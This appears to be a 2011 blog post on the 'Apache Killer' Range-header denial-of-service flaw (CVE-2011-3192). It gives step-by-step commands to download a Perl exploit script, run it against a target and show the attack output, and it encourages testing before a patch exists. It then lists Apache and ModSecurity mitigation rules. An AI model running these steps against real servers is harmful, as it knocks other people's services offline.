Apache Killer – Denial of Service Flaw in Apache WebServer


in Penetration Testing, Web Exploitation Tools

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apache   server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix 😀

How to use ‘Apache Killer’ Exploit on Linux (BackTrack 5) :

before you use this tiny script, you have to install one perl extension using cpan utility.

cpan -i Parallel::ForkManager

Download perl script :
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl

Make it executable :
chmod u+x killapache.pl

Exploit your target :
perl killapache.pl example.com 50

Output :
host seems vuln
ATTACKING example.com [using 50 forks]
ATTACKING example.com [using 50 forks]
ATTACKING example.com [using 50 forks]

Mitigation for Apache Killer Range bytes header flaw?

From Full Disclosure mailing list is as follows;
More mitigation techniques defined : http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

Option 2: (Also for Apache 1.3)

# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]

Update 1 (26 Aug, 2011):

You can use mod_rewrite to mitigate this flaw

# Explicitly allow "range:0-" request from Flash uploaded client request
RewriteCond %{HTTP:range} ^bytes=0-$
RewriteRule .* - [L]

# @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2
RewriteCond %{HTTP:range} ^bytes=[^,]+(,[^,]+){0,4}$
RewriteRule .* - [F]

For Mod_Security ModSecurity 1.x users might do the trick – assuming they don’t really rely or use range request headers for anything.

# ApacheKiller - 2011 Flaw
SecFilterSelective HTTP_Range !(^$|^bytes=0-$)
SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$)

Supposed to say: We accept range headers only when
- "^$" empty value - or header not present
- value is "bytes=0-"

Update 2 : Apache Releases FIX
Complete release is available here.

If you are still unable to fix this flaw, you can contact me for FREE Consultancy

Related Posts:

Previous post:

Next post: